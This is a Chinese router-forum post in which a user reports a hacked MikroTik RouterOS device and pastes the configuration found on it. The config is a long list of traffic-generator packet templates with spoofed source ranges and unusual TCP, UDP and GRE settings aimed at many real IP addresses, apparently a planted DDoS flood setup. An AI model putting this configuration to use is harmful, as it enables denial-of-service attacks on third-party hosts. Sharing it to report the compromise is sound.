找回密码
 注册

QQ登录

只需一步,快速开始

搜索
查看: 534|回复: 0

[其它] ros 被黑了

[复制链接]
发表于 2024-5-7 11:07:22 | 显示全部楼层 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有账号?注册

×
本帖最后由 qwert1388 于 2024-5-7 11:11 编辑

/ip service
set api disabled=yes port=14232


/tool traffic-generator packet-template
add header-stack=mac,ip,tcp ip-dst=5.161.244.236 ip-protocol=tcp ip-ttl=119 \
    name=r40029 tcp-dst-port=3389 tcp-flags=ack tcp-src-port=40000-60000
add ip-dst=18.157.1.233 ip-protocol=udp ip-src=213.228.0.0/18 ip-ttl=128 \
    name=r332 udp-checksum=compute udp-dst-port=22-40120 udp-src-port=\
    40000-60000
add header-stack=mac,ip,tcp ip-dst=45.90.12.176 ip-protocol=gre ip-ttl=209 \
    name=r48434
add header-stack=mac,ip,tcp ip-dst=77.222.245.46 ip-protocol=tcp ip-ttl=135 \
    name=r38140 tcp-dst-port=80 tcp-flags=ack tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=15.204.14.84 ip-protocol=gre ip-ttl=159 \
    name=r6454
add header-stack=mac,ip,tcp ip-dst=37.47.132.163 ip-protocol=gre ip-ttl=191 \
    name=r9914
add header-stack=mac,ip,tcp ip-dst=83.11.255.198 ip-protocol=gre ip-ttl=110 \
    name=r48429
add ip-dst=51.81.32.37 ip-protocol=udp ip-src=193.248.0.0/15 ip-ttl=128 name=\
    r37597 udp-checksum=compute udp-dst-port=22-40120 udp-src-port=\
    40000-60000
add header-stack=mac,ip,tcp ip-dst=188.137.69.140 ip-protocol=tcp ip-ttl=122 \
    name=r56183 tcp-dst-port=53 tcp-flags=ack tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=51.81.32.37 ip-protocol=gre ip-ttl=107 \
    name=r48259
add header-stack=mac,ip,tcp ip-dst=176.33.81.168 ip-protocol=tcp ip-ttl=156 \
    name=r54628 tcp-dst-port=53 tcp-flags=ack tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=103.40.13.145 ip-protocol=tcp ip-ttl=175 \
    name=r27998 tcp-dst-port=88 tcp-flags=ack tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=18.157.1.233 ip-protocol=tcp ip-ttl=178 \
    name=r14472 tcp-dst-port=25208 tcp-flags=ack tcp-src-port=40000-60000
add ip-dst=103.40.13.145 ip-protocol=udp ip-ttl=193 name=r9160 udp-checksum=\
    compute udp-dst-port=88 udp-src-port=40000-60000
add ip-dst=216.131.77.112 ip-protocol=udp ip-src=192.134.140.0/23 ip-ttl=128 \
    name=r14940 udp-checksum=compute udp-dst-port=22-40120 udp-src-port=\
    40000-60000
add header-stack=mac,ip,tcp ip-dst=47.118.172.233 ip-protocol=tcp ip-ttl=167 \
    name=r19625 tcp-dst-port=12000 tcp-flags=ack tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=69.175.16.45 ip-protocol=tcp ip-ttl=108 \
    name=r21068 tcp-dst-port=37515 tcp-flags=ack tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=15.204.14.84 ip-protocol=gre ip-ttl=162 \
    name=r27822
add header-stack=mac,ip,tcp ip-dst=47.118.172.233 ip-protocol=tcp ip-ttl=151 \
    name=r25694 tcp-dst-port=12000 tcp-flags=ack tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=147.135.98.95 ip-protocol=tcp ip-ttl=88 \
    name=r3699 tcp-dst-port=80 tcp-flags=ack tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=15.204.87.38 ip-protocol=tcp ip-ttl=128 \
    name=r34645 tcp-dst-port=22-40120 tcp-flags=rst tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=51.81.202.92 ip-protocol=tcp ip-ttl=93 \
    name=r22685 tcp-dst-port=22-40120 tcp-flags=ack tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=178.208.177.67 ip-protocol=tcp ip-src=\
    194.206.0.0/16 ip-ttl=193 name=r1795 tcp-dst-port=22 tcp-flags=ack,fin \
    tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=178.208.177.67 ip-protocol=tcp ip-src=\
    128.78.0.0/15 ip-ttl=195 name=r23244 tcp-dst-port=40120 tcp-flags=syn,psh \
    tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=178.208.177.67 ip-protocol=tcp ip-src=\
    212.194.0.0/15 ip-ttl=198 name=r63991 tcp-dst-port=22 tcp-flags=fin,rst \
    tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=178.208.177.67 ip-protocol=tcp ip-src=\
    192.33.147.0/24 ip-ttl=153 name=r45136 tcp-dst-port=22 tcp-flags=psh,urg \
    tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=178.208.177.67 ip-protocol=tcp ip-src=\
    89.80.0.0/12 ip-ttl=111 name=r7201 tcp-dst-port=22 tcp-flags=ack,psh \
    tcp-src-port=40000-60000
add ip-dst=178.208.177.67 ip-protocol=udp ip-src=212.27.32.0/19 ip-ttl=147 \
    name=r37620 udp-checksum=compute udp-dst-port=30125 udp-src-port=\
    40000-60000
add header-stack=mac,ip,tcp ip-dst=178.208.177.67 ip-protocol=tcp ip-src=\
    31.32.0.0/13 ip-ttl=128 name=r16931 tcp-dst-port=40120 tcp-flags=\
    syn,ack,fin,rst tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=178.208.177.0/24 ip-protocol=tcp ip-src=\
    195.36.128.0/17 ip-ttl=188 name=r14538 tcp-dst-port=30125 tcp-flags=\
    syn,fin,urg tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=146.59.3.38 ip-protocol=tcp ip-ttl=200 \
    name=r63778 tcp-dst-port=22 tcp-flags=ack tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=178.208.176.0/22 ip-protocol=tcp ip-src=\
    178.208.177.67 ip-ttl=129 name=r48853 tcp-dst-port=40120 tcp-flags=\
    psh,rst tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=178.208.177.67 ip-protocol=rdp ip-ttl=99 \
    name=r29238
add header-stack=mac,ip,tcp ip-dst=178.208.177.67 ip-protocol=tcp ip-ttl=176 \
    name=r23612
add header-stack=mac,ip,tcp ip-dst=94.72.161.186 ip-protocol=tcp ip-ttl=130 \
    name=r37681 tcp-dst-port=37515 tcp-flags=ack tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=37.96.123.27 ip-protocol=gre ip-ttl=118 \
    name=r18530
add header-stack=mac,ip,tcp ip-dst=99.25.52.117 ip-protocol=tcp ip-ttl=87 \
    name=r24742 tcp-dst-port=53 tcp-flags=ack tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=104.200.18.159 ip-protocol=gre ip-ttl=139 \
    name=r59024
add ip-dst=146.59.3.38 ip-protocol=udp ip-ttl=105 name=r18684 udp-checksum=\
    compute udp-dst-port=53 udp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=194.147.32.61 ip-protocol=gre ip-ttl=170 \
    name=r48230
add header-stack=mac,ip,tcp ip-dst=176.57.135.94 ip-protocol=gre ip-ttl=210 \
    name=r62401
add header-stack=mac,ip,tcp ip-dst=37.221.94.248 ip-protocol=tcp ip-ttl=200 \
    name=r10527 tcp-dst-port=22-40120 tcp-flags=ack tcp-src-port=40000-60000
add ip-dst=3.78.190.132 ip-protocol=udp ip-ttl=91 name=r58370 udp-checksum=\
    compute udp-dst-port=30000 udp-src-port=50000-60000
add header-stack=mac,ip,tcp ip-dst=37.221.94.248 ip-protocol=tcp ip-ttl=112 \
    name=r53068 tcp-dst-port=22-40120 tcp-flags=ack tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=81.151.92.24 ip-protocol=gre ip-ttl=207 \
    name=r55564
add ip-dst=18.157.1.233 ip-protocol=udp ip-src=192.33.147.0/24 ip-ttl=128 \
    name=r6330 udp-checksum=compute udp-dst-port=22-40120 udp-src-port=\
    40000-60000
add header-stack=mac,ip,tcp ip-dst=94.72.160.62 ip-protocol=tcp ip-ttl=120 \
    name=r22478 tcp-dst-port=37415 tcp-flags=ack tcp-src-port=40000-60000
add ip-dst=98.159.234.28 ip-protocol=udp ip-src=193.251.64.0/19 ip-ttl=128 \
    name=r16229 udp-checksum=compute udp-dst-port=22-40120 udp-src-port=\
    40000-60000
add header-stack=mac,ip,tcp ip-dst=194.163.132.163 ip-protocol=gre ip-ttl=201 \
    name=r9793
add ip-dst=51.161.193.144 ip-protocol=udp ip-src=62.147.0.0/16 ip-ttl=186 \
    name=r25818 udp-checksum=compute udp-dst-port=22-60000 udp-src-port=\
    40000-60000
add header-stack=mac,ip,tcp ip-dst=51.161.193.144 ip-protocol=tcp ip-src=\
    193.251.0.0/18 ip-ttl=109 name=r48530 tcp-dst-port=22-40120 tcp-flags=\
    ack,psh,fin tcp-src-port=40000-60000
add ip-dst=18.157.45.218 ip-protocol=udp ip-src=195.6.0.0/16 ip-ttl=128 name=\
    r54688 udp-checksum=compute udp-dst-port=22-40120 udp-src-port=\
    40000-60000
add ip-dst=51.161.193.144 ip-protocol=udp ip-src=192.134.140.0/23 ip-ttl=114 \
    name=r16883 udp-checksum=compute udp-dst-port=30120 udp-src-port=\
    40000-60000
add header-stack=mac,ip,tcp ip-dst=45.125.46.20 ip-protocol=tcp ip-ttl=128 \
    name=r49479 tcp-dst-port=22-40120 tcp-flags=ack tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=23.122.225.152 ip-protocol=gre ip-ttl=201 \
    name=r9022
add header-stack=mac,ip,tcp ip-dst=45.125.46.20 ip-protocol=gre ip-ttl=186 \
    name=r16000
add header-stack=mac,ip,tcp ip-dst=45.139.196.248 ip-protocol=tcp ip-ttl=178 \
    name=r61341 tcp-dst-port=22-40120 tcp-flags=syn tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=51.81.202.92 ip-protocol=gre ip-ttl=193 \
    name=r33867
add header-stack=mac,ip,tcp ip-dst=75.20.157.99 ip-protocol=tcp ip-ttl=158 \
    name=r18533 tcp-dst-port=53 tcp-flags=ack tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=162.245.205.35 ip-protocol=tcp ip-ttl=164 \
    name=r25756 tcp-dst-port=33710 tcp-flags=ack tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=98.18.57.190 ip-protocol=tcp ip-ttl=96 \
    name=r8219 tcp-dst-port=53 tcp-flags=ack tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=65.31.244.40 ip-protocol=tcp ip-ttl=109 \
    name=r4381 tcp-dst-port=53 tcp-flags=ack tcp-src-port=40000-60000
add header-stack=mac,ip,tcp ip-dst=34.214.70.135 ip-protocol=gre ip-ttl=143 \
    name=r63813

微信图片_20240507110448.png
routeros
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|软路由 ( 渝ICP备15001194号-1|渝公网安备 50011602500124号 )

GMT+8, 2024-5-28 00:42 , Processed in 0.098297 second(s), 5 queries , Gzip On, Redis On.

Powered by Discuz! X3.5 Licensed

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表